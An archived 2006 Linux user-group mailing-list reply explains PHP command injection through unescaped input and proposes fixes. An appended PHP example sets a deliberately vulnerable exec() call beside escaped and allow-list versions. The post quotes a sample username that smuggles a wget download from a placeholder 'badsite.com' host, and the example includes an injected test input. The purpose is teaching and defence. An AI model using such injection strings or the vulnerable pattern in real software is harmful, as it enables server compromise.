[CS-FSLUG] PHP vulnerabilities?

Tim Young Tim.Young at LightSys.org
Fri Jun 2 08:42:15 CDT 2006

There are quite a number of ways to do this sort of thing.  Most of the 
time it is a poorly written PHP (or other language) script.  The basic 
thing is when you give someone the ability to input something.  For 
example, a username.

Instead of having a username "Tim", they use something like:
    "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf 

If whoever wrote the php program did not properly escape the variables 
on the way in, there is a decent chance that the variable will be used 
in some context where it will be executed.

The reason such things occur is because most people, when they are 
programming PHP, do not read up on PHP security (from the PHP online 
docs).  They have some really good information in the contributed 
portions of the documentation.

No matter how well you lock down the server itself, if the code you run 
on the server is poorly written, it can still be compromised.  :)

There are a few good ways to thwart this sort of behavior.  A very 
simple way, if you cannot program PHP securely, is to use iptables to 
disallow outgoing connections from being originated from the server 
itself (only allow response packets).  Then someone would need to 
compromise root to gain the permission to remove your iptables before 
they can download files...

    - Tim Young

Ps.  The code I gave was a non-functional example.  It is close to what 
would be used, though it should not work breaking into anything.  If you 
want to have real-life examples that do work, read the PHP security pages.

Ed Hurst wrote:
> Legatus wrote:
>> of folks. The file probably doesn't exist. It is probably embedded in 
>> a PHP script, and the query string calls a function that then generates 
>> the file for download. The offending file was probably injected 
>> using a buffer overflow or other vulnerability in PHP, or by accessing 
>> another site on the same server that has a flaky file upload script, 
>> that will allow people to add a full path to the file they are 
>> uploading, thus putting the file exactly where they want. There are 
>> probably a hundred other ways to do this.
> So this is likely generated by a script? Obviously I know nothing of
> PHP, aside from reading about vulnerabilities. I'm guessing a standard
> script is replaced by the cracker, which adds this extra capability
> undetected, eh?

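The injection Tim describes, shown as an added example that is not code from the original message: a username spliced raw into a string passed to PHP's exec(), beside the same call with escapeshellarg() and with an allow-list check on the way in. The "echo user=..." command is a stand-in for whatever real command a script might run, and the function names and sample inputs are constructed for this illustration; exec() and escapeshellarg() are standard PHP functions.

```php
<?php
// Added example (not from the original post). Run with: php cmdinject.php
// The "echo user=..." command is a stand-in (assumption) for any shell
// command a script builds from user input; the bug is the string splice,
// not the command itself.
declare(strict_types=1);

// Constructed sample inputs: a normal username and an injected one.
// A real attacker would put a download-and-execute chain where
// "echo INJECTED" is.
$benign  = 'Tim';
$hostile = 'Tim; echo INJECTED';

// Vulnerable: the raw variable is interpolated into the command string,
// so the shell sees two commands. This is the pattern the post warns about.
function lookupVulnerable(string $username): array
{
    $out = [];
    exec("echo user=$username", $out);   // never do this
    return $out;                         // one line per line of output
}

// Hardened: escapeshellarg() wraps the value in single quotes and escapes
// any embedded quotes, so the shell sees exactly one argument.
function lookupEscaped(string $username): array
{
    $out = [];
    exec('echo user=' . escapeshellarg($username), $out);
    return $out;
}

// Better still: validate on the way in with an allow-list and reject the
// request rather than trying to clean it. A username never legitimately
// contains ';', '|', '$', quotes or spaces, so there is nothing to lose.
function assertValidUsername(string $username): string
{
    if (!preg_match('/^[a-z_][a-z0-9_-]{0,31}$/i', $username)) {
        throw new InvalidArgumentException("rejected username: $username");
    }
    return $username;
}

echo "vulnerable, benign : ", implode(' | ', lookupVulnerable($benign)), "\n";
// prints "user=Tim"
echo "vulnerable, hostile: ", implode(' | ', lookupVulnerable($hostile)), "\n";
// prints "user=Tim | INJECTED" -- the second command ran
echo "escaped,    hostile: ", implode(' | ', lookupEscaped($hostile)), "\n";
// prints "user=Tim; echo INJECTED" -- the payload is just text now
try {
    lookupEscaped(assertValidUsername($hostile));
} catch (InvalidArgumentException $e) {
    echo "allow-list, hostile: ", $e->getMessage(), "\n";
}
```

The allow-list check is the one to rely on: escapeshellarg() protects only the argument position of a shell command, and the same raw value could just as easily end up inside an SQL query, an include() path, or an eval(), each of which needs its own escaping. Rejecting anything that is not a plausible username on the way in covers all of them at once.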